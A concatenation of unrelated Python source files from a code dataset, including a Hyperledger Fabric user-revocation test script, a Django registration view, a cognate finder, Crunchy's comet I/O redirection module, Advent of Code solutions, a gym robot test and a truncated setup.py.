% {\n 'username': username,\n 'org_name': org_name,\n 'org_admin_home': org_admin_home\n }, flush=True)\n\n call(['fabric-ca-client',\n 'revoke', '-d',\n '-c', '/data/orgs/' + org_name + '/admin/fabric-ca-client-config.yaml',\n '--revoke.name', username,\n '--gencrl'])\n\n\ndef fetchConfigBlock(org_name, peer):\n org = conf['orgs'][org_name]\n\n org_admin_home = org['admin_home']\n org_admin_msp_dir = org_admin_home + '/msp'\n channel_name = conf['misc']['channel_name']\n orderer = conf['orderers']['orderer']\n config_block_file = conf['misc']['config_block_file']\n\n print('Fetching the configuration block of the channel \\'%s\\'' % channel_name, flush=True)\n\n # update config path for using right core.yaml\n os.environ['FABRIC_CFG_PATH'] = '/conf/' + org_name + '/' + peer['name']\n # update mspconfigpath for getting the one in /data\n os.environ['CORE_PEER_MSPCONFIGPATH'] = org_admin_msp_dir\n\n call(['peer', 'channel', 'fetch', 'config', config_block_file,\n '-c', channel_name,\n '-o', '%(host)s:%(port)s' % {'host': orderer['host'], 'port': orderer['port']},\n '--tls',\n '--clientauth',\n '--cafile', orderer['tls']['certfile'],\n '--keyfile', '/data/orgs/' + org_name + '/tls/' + peer['name'] + '/cli-client.key',\n '--certfile', '/data/orgs/' + org_name + '/tls/' + peer['name'] + '/cli-client.crt'\n ])\n\n # clean env variables\n del os.environ['FABRIC_CFG_PATH']\n del os.environ['CORE_PEER_MSPCONFIGPATH']\n\n\ndef createConfigUpdatePayloadWithCRL(org_name):\n org = conf['orgs'][org_name]\n org_admin_home = org['admin_home']\n org_admin_msp_dir = org_admin_home + '/msp'\n\n channel_name = conf['misc']['channel_name']\n config_block_file = conf['misc']['config_block_file']\n\n print('Creating config update payload with the generated CRL for the organization \\'%s\\'' % org_name, flush=True)\n\n # Start the configtxlator\n # call('configtxlator start &', shell=True)\n proc = Popen('configtxlator start &', shell=True)\n\n print('Sleeping 5 seconds for configtxlator to start...', flush=True)\n call(['sleep', '5'])\n\n CTLURL = 'http://127.0.0.1:7059'\n # Convert the config block protobuf to JSON\n r = requests.post(CTLURL + '/protolator/decode/common.Block', data=open(config_block_file, 'rb').read())\n config_block = r.json()\n\n # Extract the config from the config block\n config = config_block['data']['data'][0]['payload']['data']['config']\n\n # Update crl in the config json\n updated_config = copy.deepcopy(config)\n with open(org_admin_msp_dir + '/crls/crl.pem', 'rb') as f:\n crl = base64.b64encode(f.read()).decode('utf8')\n updated_config['channel_group']['groups']['Application']['groups'][org_name]['values']['MSP']['value'][\n 'config']['revocation_list'] = [crl]\n\n # Create the config diff protobuf\n r = requests.post(CTLURL + '/protolator/encode/common.Config', json=config, stream=True)\n config_pb = None\n if r.status_code == 200:\n config_pb = r.content\n else:\n print(r.text, flush=True)\n\n r = requests.post(CTLURL + '/protolator/encode/common.Config', json=updated_config, stream=True)\n updated_config_pb = None\n if r.status_code == 200:\n updated_config_pb = r.content\n else:\n print(r.text, flush=True)\n\n r = requests.post(CTLURL + '/configtxlator/compute/update-from-configs', data={'channel': channel_name},\n files={'original': config_pb, 'updated': updated_config_pb})\n config_update_pb = None\n if r.status_code == 200:\n config_update_pb = r.content\n else:\n print(r.text, flush=True)\n\n # call(['curl', '-X', 'POST', '--data-binary', '@config.json', CTLURL + 
'/protolator/encode/common.Config', '>', '/tmp/config.pb'])\n # call(['curl', '-X', 'POST', '--data-binary', '@updated_config.json', CTLURL + '/protolator/encode/common.Config', '>', '/tmp/updated_config.pb'])\n # call(['curl', '-X', 'POST', '-F', 'original=@config.pb', '-F', 'updated=@updated_config.pb', CTLURL + '/configtxlator/compute/update-from-configs', '-F', 'channel=' + channel_name, '>', '/tmp/config_update.pb'])\n\n # Convert the config diff protobuf to JSON\n r = requests.post(CTLURL + '/protolator/decode/common.ConfigUpdate', data=config_update_pb, stream=True)\n config_update = {}\n if r.status_code == 200:\n config_update = r.json()\n else:\n print(r.text, flush=True)\n # call(['curl', '-X', 'POST', '--data-binary', '@config_update.pb', CTLURL + '/protolator/decode/common.ConfigUpdate', '>', '/tmp/config_update.json'])\n\n # Create envelope protobuf container config diff to be used in the \"peer channel update\" command to update the channel configuration block\n config_update_as_envelope = {\n 'payload': {\n 'header': {\n 'channel_header': {\n 'channel_id': channel_name,\n 'type': 2,\n }\n },\n 'data': {\n 'config_update': config_update\n }\n }\n }\n\n r = requests.post(CTLURL + '/protolator/encode/common.Envelope', json=config_update_as_envelope)\n if r.status_code == 200:\n with open(conf['misc']['config_update_envelope_file'], 'wb') as f:\n for chunk in r:\n f.write(chunk)\n else:\n print(r.text, flush=True)\n # echo '{\"payload\":{\"header\":{\"channel_header\":{\"channel_id\":\"'\"${CHANNEL_NAME}\"'\", \"type\":2}},\"data\":{\"config_update\":'$(cat config_update.json)'}}}' > config_update_as_envelope.json\n # curl -X POST --data-binary @config_update_as_envelope.json $CTLURL/protolator/encode/common.Envelope > $CONFIG_UPDATE_ENVELOPE_FILE\n\n # Stop configtxlator\n proc.kill()\n\n\ndef updateConfigBlock(org_name, peer):\n org = conf['orgs'][org_name]\n org_admin_home = org['admin_home']\n org_admin_msp_dir = org_admin_home + '/msp'\n\n channel_name = conf['misc']['channel_name']\n orderer = conf['orderers']['orderer']\n config_update_envelope_file = conf['misc']['config_update_envelope_file']\n\n # update config path for using right core.yaml\n os.environ['FABRIC_CFG_PATH'] = '/conf/' + org_name + '/' + peer['name']\n # update mspconfigpath for getting the one in /data\n os.environ['CORE_PEER_MSPCONFIGPATH'] = org_admin_msp_dir\n\n print('Updating the configuration block of the channel \\'%s\\'' % channel_name, flush=True)\n call(['peer', 'channel', 'update',\n '-f', config_update_envelope_file,\n '-c', channel_name,\n '-o', '%(host)s:%(port)s' % {'host': orderer['host'], 'port': orderer['port']},\n '--tls',\n '--clientauth',\n '--cafile', orderer['tls']['certfile'],\n '--keyfile', '/data/orgs/' + org_name + '/tls/' + peer['name'] + '/cli-client.key',\n '--certfile', '/data/orgs/' + org_name + '/tls/' + peer['name'] + '/cli-client.crt'\n ])\n\n # clean env variables\n del os.environ['FABRIC_CFG_PATH']\n del os.environ['CORE_PEER_MSPCONFIGPATH']\n\n\ndef queryAsRevokedUser(arg, org_name, peer, username):\n org = conf['orgs'][org_name]\n org_user_home = org['user_home']\n org_user_msp_dir = org_user_home + '/msp'\n\n # update config path for using right core.yaml\n os.environ['FABRIC_CFG_PATH'] = '/conf/' + org_name + '/' + peer['name']\n # update mspconfigpath for getting one in /data\n os.environ['CORE_PEER_MSPCONFIGPATH'] = org_user_msp_dir\n\n def clean_env_variables():\n del os.environ['FABRIC_CFG_PATH']\n del os.environ['CORE_PEER_MSPCONFIGPATH']\n\n channel_name = 
conf['misc']['channel_name']\n chaincode_name = conf['misc']['chaincode_name']\n\n print(\n 'Querying the chaincode in the channel \\'%(CHANNEL_NAME)s\\' on the peer \\'%(PEER_HOST)s\\' as revoked user \\'%(USER_NAME)s\\' ...' % {\n 'CHANNEL_NAME': channel_name,\n 'PEER_HOST': peer['host'],\n 'USER_NAME': username,\n }, flush=True)\n\n starttime = int(time.time())\n\n # Continue to poll until we get a successful response or reach QUERY_TIMEOUT\n while int(time.time()) - starttime < 15: # QUERY_TIMEOUT\n call(['sleep', '1'])\n\n try:\n check_output(['peer', 'chaincode', 'query',\n '-C', channel_name,\n '-n', chaincode_name, '-c', arg],\n stderr=STDOUT).decode()\n except CalledProcessError as e:\n output = e.output.decode()\n # uncomment for debug\n if 'access denied' in output:\n print(\n 'Expected error occurred when the revoked user \\'%(username)s\\' queried the chaincode in the channel \\'%(channel_name)s\\'\\n' % {\n 'channel_name': channel_name,\n 'username': username,\n }, flush=True)\n # clean env variables\n clean_env_variables()\n return True\n else:\n print('.', flush=True, end='')\n\n err_msg = 'The revoked user %(username)s should have failed to query the chaincode in the channel \\'%(channel_name)s\\'' % {\n 'channel_name': channel_name,\n 'username': username\n }\n print(err_msg, flush=True)\n # clean env variables\n clean_env_variables()\n return False\n\n\ndef revokeFirstOrgUser():\n # Revoke the user and generate CRL using admin's credentials\n org_name = 'owkin'\n org = conf['orgs'][org_name]\n username = org['users']['user']['name']\n peer = org['peers'][0]\n\n revokeFabricUserAndGenerateCRL('owkin', username)\n\n # Fetch config block\n fetchConfigBlock(org_name, peer)\n\n # Create config update envelope with CRL and update the config block of the channel\n createConfigUpdatePayloadWithCRL('owkin')\n updateConfigBlock(org_name, peer)\n\n return queryAsRevokedUser('{\"Args\":[\"queryObjects\", \"problem\"]}', org_name, peer, username)\n\n\ndef run():\n res = True\n\n # Revoke first org user\n res = res and revokeFirstOrgUser()\n\n if res:\n print('Congratulations! 
User has been correctly revoked', flush=True)\n call(['touch', conf['misc']['run_success_revoke_file']])\n else:\n print('User revocation failed.', flush=True)\n call(['touch', conf['misc']['run_fail_revoke_file']])\n\n\nif __name__ == \"__main__\":\n run()\n","sub_path":"python-scripts/revoke.py","file_name":"revoke.py","file_ext":"py","file_size_in_byte":10958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"495084949","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom .forms import UserRegisterForm\n\n# Create your views here.\n\ndef register(request):\n if request.method == 'POST':\n form = UserRegisterForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n messages.success(request, f'Account created for {username}!')\n return redirect('blog-home') ## Returns an HttpResponseRedirect to the URL matching the given arguments\n else:\n form = UserRegisterForm()\n return render(request, 'users/register.html', {'form': form}) ## render() builds the HttpResponse that is sent back to the browser\n\n\n\n","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"440944930","text":"from PyDictionary import PyDictionary\r\ndictionary= PyDictionary()\r\nfrom pylev import pylev\r\nimport difflib\r\nimport sys\r\n#from difflib_data import*\r\n\r\n#BeautifulSoup(html, \"html.parser\")\r\n\r\n#class DevNull:\r\n #def write(self, msg):\r\n #pass\r\n#sys.stderr = DevNull()\r\nimport goslate\r\ngs = goslate.Goslate()\r\nprint(gs.translate('hello world', 'fr'))\r\n\r\nenglish= input(\"Put in an English word for the translation and a cognate: \")\r\nfrench= gs.translate(english, 'fr')\r\n\r\n#french= input(\"Put in a French word for an English cognate: \")\r\n\r\n\r\n##french translation\r\n\r\n
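# Annotation (not in the original script): pylev may not be available everywhere; the sketch below is a minimal pure-Python fallback with the same call shape as pylev.levenshtein(a, b). It is a hypothetical helper, shown only to make explicit what the edit-distance comparison further down computes.\r\ndef levenshtein_fallback(a, b):\r\n # previous[j] holds the edit distance between the processed prefix of a and b[:j]\r\n previous = list(range(len(b) + 1))\r\n for i, ca in enumerate(a, 1):\r\n  current = [i]\r\n  for j, cb in enumerate(b, 1):\r\n   # deletion, insertion and substitution costs respectively\r\n   current.append(min(previous[j] + 1, current[j - 1] + 1, previous[j - 1] + (ca != cb)))\r\n  previous = current\r\n return previous[-1]\r\n\r\n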
##########wishful thinking! CAN BE SALVAGED!##\r\n#english= input(\"Put in an English word for the translation and a cognate: \")\r\n#print (dictionary.meaning(english))\r\n#dictionary.translate(english,'fr')\r\n#french= dictionary.translate(english,'fr')\r\n\r\n\r\nliresults=[]\r\nwith open('wordsEng.txt', 'r') as inputfile:\r\n for line in inputfile:\r\n liresults.append(line.strip().split(','))\r\n #print (liresults)\r\n\r\nwords = [[] for _ in range(26)] # one bucket per letter a-z\r\nfor result in liresults:\r\n words[ord(result[0][0])-ord('a')].append(result[0])\r\n\r\n\r\n########time to start the comparisons\r\n\r\nformerdistance=30\r\n#open the list with the matching first letter and begin the comparison\r\ncandidates= []\r\nfor word in words[(ord(french[0])-ord('a'))]:\r\n # get the distance from your word\r\n distance = pylev.levenshtein(french, word)\r\n # if the edit distance is less than the lowest edit distance\r\n if distance< formerdistance:\r\n # set the lowest edit distance to be this edit distance\r\n formerdistance=distance\r\n # add this word to a NEW list of candidates (as opposed to the old list)\r\n candidates=[word]\r\n # if the edit distance is equal to the lowest edit distance\r\n elif distance==formerdistance: \r\n # add this word to the current list of candidates\r\n candidates.append(word)\r\n # else the edit distance is greater than the lowest edit distance and we just want to move on\r\n else:\r\n continue\r\nprint (\"\")\r\nprint(candidates)\r\nprint (\"\")\r\n\r\n# now that we have a list of candidates, let's show what the difference is\r\n\r\nfor candidate in candidates:\r\n d=difflib.Differ()\r\n diff=d.compare(french,candidate)\r\n print (' '.join(diff))\r\n print (dictionary.meaning(candidate))\r\n print ('')\r\n #for line in difflib.context_diff(french, candidate):\r\n # sys.stdout.write(line) \r\n\r\n\r\n##example\r\n\r\n#def comparison(french,a_words[i]):\r\n #set_french= Counter(french)\r\n #set_a_words[i]=Counter(a_words[i])\r\n #common= set_french &set_a_words[i]\r\n\r\n#if len(a_words[i])>7:\r\n #comparison(french,a_words[i])\r\n #if common>=4:\r\n #print (a_words[i])\r\n\r\n #while french[1,2,3,4]== a_words[i][1,2,3,4]\r\n\r\n#if a_words.contains(french[1])and a_words.contains(french[2]) and a_words.contains(french[3]):\r\n\r\n#as inputfile\r\n#compare=open(filename,'r')\r\n\r\n #fp.seek (key[0]==individualletters:\r\n #write key \r\n\r\n #get key in dictionary with \r\n #searchphrase=\r\n\r\n #searchfile= open(dictionary)\r\n #for line in searchfile:\r\n #line= line.write\r\n","sub_path":"language2translate.py","file_name":"language2translate.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"356927671","text":"# -*- coding: utf-8 -*-\n\"\"\"\nHandles all the Output - i.e. 
it is used to push javascript code\nto the page asynchronously.\nAlso handles the redirection of stdin, stdout and stderr.\n\"\"\"\n\nimport threading\nimport sys\nimport re\n\nimport src.interpreter as interpreter\nimport src.utilities as utilities\nimport src.interface as interface\n\nfrom src.interface import config, accounts, names, python_version\n\n# When print statements occur in cometIO.py, they are swallowed by the\n# http server. As a result, we introduce debug_msg as a utility function\n# which plays the role of \"print\" when debugging this module\ndebug_ids = [] # [1, 2, 3, 4, 5, 6, 7, 8, 9]\n\ndef debug_msg(data, id_=None):\n \"\"\"write a debug message, debug messages always appear on stderr\"\"\"\n if id_ in debug_ids or id_ is None:\n sys.stderr.default_write(data + \"\\n\")\n\nshow_io_js = \"\"\"\n$(\"#out_%s\").html(\"\");\n$(\"#in_%s\").show();\ntry{\n $(\"#kill_%s\").show();\n }\ncatch(err){;} /* may not exist if ctypes not present. */\n\n\"\"\"\nhide_io_js = \"\"\"\n$(\"#in_%s\").hide();\ntry{\n $(\"#kill_%s\").hide();\n $(\"#kill_image_%s\").hide();\n }\ncatch(err){;} /* may not exist if ctypes not present. */\n\"\"\"\n# this should probably be animated:\nshow_help_js = \"\"\"\n$(\"#help_menu,#help_menu_x\").show();\n\"\"\"\n\nclass StringBuffer(object):\n \"\"\"A thread safe buffer used to queue up strings that can be appended\n together. I've left this in a separate class because it might one day be\n useful someplace else\"\"\"\n def __init__(self):\n self.lock = threading.RLock()\n self.event = threading.Event()\n self.data = \"\"\n def get(self):\n \"\"\"get the current contents of the buffer, if the buffer is empty, this\n always blocks until data is available.\n Multiple clients are handled in no particular order\"\"\"\n debug_msg(\"entering StringBuffer.get\", 1)\n while True:\n debug_msg(\"begin loop\", 5)\n self.event.clear()\n debug_msg(\"cleared events\", 5)\n self.lock.acquire()\n debug_msg(\"acquired lock\", 5)\n if len(self.data) > 0:\n t = self.data\n self.data = \"\"\n self.lock.release()\n debug_msg(\"leaving StringBuffer.get: \" + t, 1)\n return t\n self.lock.release()\n debug_msg(\"released lock\", 5)\n self.event.wait()\n\n def getline(self, uid):\n \"\"\"basically does the job of readline\"\"\"\n debug_msg(\"entering StringBuffer.getline\", 2)\n while True:\n self.event.clear()\n self.lock.acquire()\n data_t = self.data.split(\"\\n\", 1)\n if len(data_t) > 1:\n # we have a complete line, do something with it\n self.data = data_t[1]\n self.lock.release()\n debug_msg(\"leaving StringBuffer.getline: \" + data_t[0] +\n \"end_of_data\", 2)\n return uid, data_t[0] + \"\\n\"\n # no luck:\n self.lock.release()\n self.event.wait()\n\n def put(self, data):\n \"\"\"put some data into the buffer\"\"\"\n debug_msg(\"entering StringBuffer.put: \" + data, 3)\n self.lock.acquire()\n self.data += data\n self.event.set()\n self.lock.release()\n debug_msg(\"Leaving StringBuffer.put:\", 3)\n\nclass CrunchyIOBuffer(StringBuffer):\n \"\"\"A version optimised for crunchy IO\"\"\"\n help_flag = False\n\n def put_output(self, data, uid):\n \"\"\"put some output into the pipe\"\"\"\n\n #apply before_output hook first\n data = interface.plugin['services'].apply_io_hook('ANY', 'before_output', data)\n data = interface.plugin['services'].apply_io_hook(uid, 'before_output', data)\n if data == \"\":\n return\n data = data.replace('\"', '&#34;')\n pdata = data.replace(\"\\\\\", \"\\\\\\\\\")\n pdata = pdata.replace(\"\\n\", \"\\\\n\")\n pdata = pdata.replace(\"\\r\", \"\\\\r\")
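\n # Annotation (not in the original): the order of the three replace calls above matters; backslashes must be doubled first, since doubling them after escaping \"\\n\" or \"\\r\" would corrupt the backslashes those escapes just introduced into the javascript string sent to the browser.\n 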
debug_msg(\"pdata = \"+ pdata, 4)\n if python_version < 3:\n try:\n pdata = pdata.decode('utf-8')\n except:\n debug_msg(' Crunchy Error in trying to decode inside cometIO.py')\n debug_msg(' The likely cause is trying to print a unicode string prefixed by u')\n debug_msg(' as in u\"...\". If not, please file a bug report.')\n self.lock.acquire()\n pageid = uid.split(\"_\")[0]\n username = names[pageid]\n debug_msg(\"username = %s in CrunchyIOBuffer.put_output\"%username, 5)\n if self.data.endswith('\";//output\\n'):\n self.data = self.data[:-11] + '%s\";//output\\n' % (pdata)\n # Saving session; appending from below\n if uid in config[username]['logging_uids']:\n log_id = config[username]['logging_uids'][uid][0]\n config[username]['log'][log_id].append(data)\n utilities.log_session(username)\n self.event.set()\n elif self.help_flag == True:\n self.put(show_help_js)\n pdata = pdata.replace(\"class='%s'\"%interface.generic_output, \"class='help_menu'\")\n # use jQuery:\n self.put(\"\"\"$(\"#help_menu\").html(\"%s\");\\n\"\"\" % (pdata))\n self.help_flag = False\n else:\n #use jQuery:\n self.put(\"\"\"$(\"#out_%s\").append(\"%s\");//output\\n\"\"\" % (uid, pdata))\n # Saving session; first line...\n if uid in config[username]['logging_uids']:\n log_id = config[username]['logging_uids'][uid][0]\n config[username]['log'][log_id].append(data)\n utilities.log_session(username)\n self.lock.release()\n\n# there is one CrunchyIOBuffer for output per page:\noutput_buffers = {}\n# and one StringBuffer per input widget:\ninput_buffers = {}\n# and also one thread per input widget:\nthreads = {}\n\ndef kill_thread(uid):\n \"\"\"Kill a thread, given an associated uid\"\"\"\n threads[uid].terminate()\n\ndef comet(request):\n \"\"\"An http path handler, called from the page - blocks until there is data\n to be sent.\n This needs to be registered as a handler when Crunchy is launched.\"\"\"\n debug_msg(\"Entering comet() in cometIO.py\", 9)\n pageid = request.args[\"pageid\"]\n debug_msg(\" ... request.args = %s\" % request.args, 9)\n #wait for some data\n debug_msg(\" ... wait for data\", 9)\n data = output_buffers[pageid].get()\n debug_msg(\" ... found data\", 9)\n # OK, data found\n request.send_response(200)\n request.end_headers()\n\n # Whereas for Python 2 data is passed in encoded strings, with\n # Python 3, request data (from std{in, out, err}) is passed along in\n # Unicode strings; these need to\n # be encoded to be properly understood by the browser\n #if python_version >= 3:\n data = data.encode('utf-8')\n\n request.wfile.write(data)\n request.wfile.flush()\n debug_msg(\" ... 
done in comet()\", 9)\n\ndef register_new_page(pageid):\n \"\"\"Sets up the output queue for a new page\"\"\"\n output_buffers[pageid] = CrunchyIOBuffer()\ninterface.from_comet['register_new_page'] = register_new_page\n\ndef write_js(pageid, jscode):\n \"\"\"write some javascript to a page\"\"\"\n output_buffers[pageid].put(jscode)\n\ndef write_output(pageid, uid, output):\n '''write some simple output to an element identified by its uid'''\n try:\n output_buffers[pageid].put_output(output, uid)\n except:\n debug_msg(\"Problem in write_output\", 6)\n\ndef do_exec(code, uid, doctest=False):\n \"\"\"exec code in a new thread (and isolated environment).\n \"\"\"\n debug_msg(\"Entering cometIO.do_exec()\", 9)\n # When a security mode is set to \"display ...\", we only parse the\n # page, but no Python execution is allowed from that page.\n try:\n pageid = uid.split(\"_\")[0]\n username = names[pageid]\n except:\n debug_msg(\"error in do_exec; uid =%s\"%uid, 8)\n return\n\n if 'display' in config[username]['_get_current_page_security_level']():\n return\n elif not accounts: # same if no username/password set\n return\n\n # make the io widget appear\n output_buffers[pageid].put(show_io_js % (uid, uid, uid))\n debug_msg(\" creating an interpreter instance in cometIO.do_exec()\", 9)\n t = interpreter.Interpreter(code, uid, symbols=config[username]['symbols'],\n doctest=doctest)\n debug_msg(\" setting a daemon thread in cometIO.do_exec()\", 5)\n t.setDaemon(True)\n debug_msg(\" starting the thread in cometIO.do_exec()\", 5)\n t.start()\n debug_msg(\"reached the end of cometIO.do_exec()\", 5)\n\ndef push_input(request):\n \"\"\"An http request handler to deal with stdin\"\"\"\n uid = request.args[\"uid\"]\n pageid = uid.split(\"_\")[0]\n # echo back to output:\n if python_version >= 3:\n request.data = request.data.decode('utf-8')\n in_to_browser = utilities.changeHTMLspecialCharacters(request.data)\n in_to_browser = in_to_browser.replace('\\\\', r'\\\\')\n output_buffers[pageid].put_output(\"<span class='%s'>\"%interface.generic_output +\n in_to_browser + \"</span>\", uid)\n # display help menu on a separate div\n if request.data.startswith(\"help(\"):\n output_buffers[pageid].help_flag = True\n\n # ipython style help\n if request.data.rstrip().endswith(\"?\"):\n output_buffers[pageid].help_flag = True\n help_str = \"help(\" + request.data.rstrip()[:-1] + \")\\n\"\n input_buffers[uid].put(help_str)\n else:\n input_buffers[uid].put(request.data)\n\n request.send_response(200)\n request.end_headers()\n\ndef raw_push_input(uid, data):\n input_buffers[uid].put(data)\n\ndef is_accept_input(uid):\n return uid in input_buffers\n\nclass ThreadedBuffer(object):\n \"\"\"Split some IO according to calling thread\"\"\"\n def __init__(self, out_buf=None, in_buf=None, buf_class=\"STDOUT\"):\n \"\"\"Initialise the object,\n out_buf is the default output stream, in_buf is input\n buf_class is a class to apply to the output - redirected output can be\n put in an html element with class=buf_class.\n Interestingly, having two threads with the same uids shouldn't break anything :)\n \"\"\"\n self.default_out = out_buf\n self.default_in = in_buf\n self.buf_class = buf_class
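\n # Annotation (not in the original): instances of this class replace\n # sys.stdin/stdout/stderr at the bottom of this module; write() and\n # readline() dispatch on threading.currentThread().getName(), so a thread\n # registered via register_thread() gets its IO routed to its own page\n # widget while everything else falls through to the saved\n # default_out/default_in streams.\n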
# Unfortunately, IPython interferes with Crunchy.\n# The following is kept un-commented (unlike the rest of the IPython stuff\n# which has been commented out) so that users can try the relevant\n# code to start IPython from an interpreter or an editor and see\n# what happens.\n # the encoding is required by IPython but currently ignored by Crunchy.\n self.encoding = 'utf-8'\n # the following is defined as a dummy function to make IPython work;\n # it is currently ignored by Crunchy.\n def flush(self):\n '''\n dummy function required by IPython; otherwise ignored by Crunchy.\n\n Currently unused.\n '''\n return\n#==== end of IPython stuff\n\n def register_thread(self, uid):\n \"\"\"register the current thread for redirected IO under the given uid\"\"\"\n mythread = threading.currentThread()\n mythread.setName(uid)\n input_buffers[uid] = StringBuffer()\n threads[uid] = threading.currentThread()\n debug_msg(\"registering thread for uid=%s\" % uid, 8)\n\n def unregister_thread(self):\n \"\"\"\n Unregister the current thread.\n This will cancel all pending input.\n Assumes that no more input will be written specifically for this thread.\n In future, IO for this thread will go via the defaults.\n \"\"\"\n uid = threading.currentThread().getName()\n if not self.__redirect(uid):\n return\n pageid = uid.split(\"_\")[0]\n del input_buffers[uid]\n # hide the input box and the Stop thread link\n output_buffers[pageid].put(hide_io_js % (uid, uid, uid))\n\n\n def write(self, data):\n \"\"\"write some data\"\"\"\n\n # First, check to see whether this is intended for comet at\n # all. This lets us use pdb, among other things, without\n # characters being escaped for HTML.\n uid = threading.currentThread().getName()\n if not self.__redirect(uid):\n try:\n return self.default_out.write(data)\n except:\n return self.default_out.write(data.encode('utf-8'))\n\n # Note: even though we create interpreters in separate threads\n # identified by their uid, Borg interpreters share a common\n # state. As a result, if we have long running code in one\n # Borg interpreter, there can be exchange of input or output between\n # the code running in that interpreter and code entered in another one.\n pageid = uid.split(\"_\")[0]\n data = utilities.changeHTMLspecialCharacters(data)\n\n debug_msg(\"write --- data , \" + data.replace('\\\\', r'\\\\'), 4)\n #Note: in the following, it is important to ensure that the\n # py_prompt class is surrounded by single quotes - not double ones.\n # normal prompt\n\n for _prompt in ['>>> ', # normal prompt\n '... ', # normal continuation prompt\n '--> ', # isolated prompt\n '<t>>> ', # type info prompt\n '_u__) ', # parrot\n '_u__)) ' # Parrots\n ]:\n dd = data.split('crunchy_py_prompt%s' % _prompt)\n data = (\"<span class='%s'>%s</span>\" % (interface.generic_prompt, _prompt)).join(dd)\n\n data = data.replace('\\\\', r'\\\\')\n data = \"<span class='%s'>%s</span>\" % (self.buf_class, data)\n output_buffers[pageid].put_output(data, uid)\n\n def read(self):\n \"\"\"N.B. 
this function is rarely, if ever, used - and is probably untested\"\"\"\n uid = threading.currentThread().getName()\n if self.__redirect(uid):\n #read the data\n data = input_buffers[uid].get()\n else:\n data = self.default_in.read()\n return data\n\n def readline(self):\n \"\"\"used by Interactive Console - raw_input(\">>>\")\"\"\"\n\n uid = threading.currentThread().getName()\n new_id = \"none\"\n debug_msg(\"entering readline, uid=%s\" % uid, 7)\n if self.__redirect(uid):\n new_id, data = input_buffers[uid].getline(uid)\n else:\n data = self.default_in.readline()\n debug_msg(\"leaving readline, uid=%s, new_id=%s\\ndata=%s\" % (uid,\n new_id, data), 7)\n return data\n\n def __redirect(self, uid):\n \"\"\"decide if the thread with uid uid should be redirected\"\"\"\n t = uid in input_buffers\n return t\n\n def default_write(self, data):\n \"\"\"write to the default output\"\"\"\n # Normalize to Unicode because Python 3's doctest will not\n # take bytes for its _SpoofOut = self.default_out.\n if python_version < 3:\n data = data.decode('utf-8')\n self.default_out.write(data)\n\nsys.stdin = ThreadedBuffer(in_buf=sys.stdin)\ndef init_stdios():\n # Note: we use Pygments classes\n sys.stdout = ThreadedBuffer(out_buf=sys.stdout, buf_class=interface.generic_output)\n sys.stderr = ThreadedBuffer(out_buf=sys.stderr, buf_class=interface.generic_traceback)\ninit_stdios()\ninterface.init_stdios = init_stdios\n","sub_path":"crunchy/src/cometIO.py","file_name":"cometIO.py","file_ext":"py","file_size_in_byte":15473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"130160018","text":"#1\nwith open('day2-data.txt') as f:\n line = f.readline()\n data = [int(x.strip()) for x in line.split(',')]\n data[1] = 12\n data[2] = 2\n for ix, num in enumerate(data):\n if ix % 4 == 0:\n if num == 1:\n data[data[ix+3]] = data[data[ix+1]] + data[data[ix+2]]\n elif num == 2:\n data[data[ix+3]] = data[data[ix+1]] * data[data[ix+2]]\n elif num == 99:\n break\n \n print(data[0])\n\nf.close()\n\n#2\nimport copy\nwith open('day2-data.txt') as f:\n line = f.readline()\n data = [int(x.strip()) for x in line.split(',')]\n expected_output = 19690720\n for noun in range(100):\n for verb in range(100):\n d = copy.deepcopy(data)\n d[1] = noun\n d[2] = verb\n for ix, num in enumerate(d):\n if ix % 4 == 0:\n if num == 1:\n d[d[ix+3]] = d[d[ix+1]] + d[d[ix+2]]\n elif num == 2:\n d[d[ix+3]] = d[d[ix+1]] * d[d[ix+2]]\n elif num == 99:\n break\n if d[0] == expected_output:\n print(100 * noun + verb)\n\nf.close()","sub_path":"day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"250188246","text":"import gym\nimport matplotlib.pyplot as plt\n\nmode = 'human'\n#mode = 'rgb_array'\n\nenv = gym.make(\"UR5Catch-v1\")\n#env = gym.make('FetchSlide-v1')\n\nenv.render('human')\n#env = gym.wrappers.Monitor(env, './video', force=True)\n#plt.imshow(env.render(mode='rgb_array', camera_id=-1))\n#plt.show()\nfor i in range(20):\n env.reset()\n env.render('human')\n for i in range(200):\n action = env.action_space.sample()\n print(\"action_space:\", env.action_space)\n print(\"action space sample:\", action)\n obs, reward, done, info = env.step(action)\n print(\"observation:\", obs)\n print(\"reward:\", reward)\n print(\"done:\", done)\n print(\"info:\", info)\n 
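# Annotation (not in the original): with this classic gym API, once done is True the episode is over; a typical loop would break here or call env.reset() instead of continuing to step a finished episode.\n 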
env.render('human')\n\n","sub_path":"ur5-test.py","file_name":"ur5-test.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"611511172","text":"import sys\n\nfrom setuptools import find_packages, setup\n\nwith open('runcommands/__init__.py') as fp:\n for line in fp:\n if line.startswith('__version__'):\n __version__ = line.split('=')[1].strip()[1:-1]\n\nwith open('README.rst') as fp:\n long_description = fp.read().strip()\n\ninstall_requires = []\n\nif sys.version_info[:2] < (3, 4):\n install_requires.append('enum34')\n\nsetup(\n name='runcommands',\n version=__version__,\n license='MIT',\n author='Wyatt Baldwin',\n author_email='self@wyattbaldwin.com',\n description='A simple command runner',\n long_description=long_description,\n url='https://bitbucket.org/wyatt/runcommands',\n packages=find_packages(),\n package_data={\n 'runcommands.completion': ['*/*'],\n 'runcommands.tests': ['*.cfg'],\n },\n install_requires=install_requires,\n extras_require={\n 'dev': [\n 'coverage',\n 'flake8',\n 'Sphinx',\n ],\n 'paramiko': [\n 'paramiko>=2.1.2',\n ],\n 'tox': [\n 'flake8',\n 'tox',\n ],\n },\n entry_points={\n 'console_scripts': [\n 'run = runcommands.__main__:main',\n 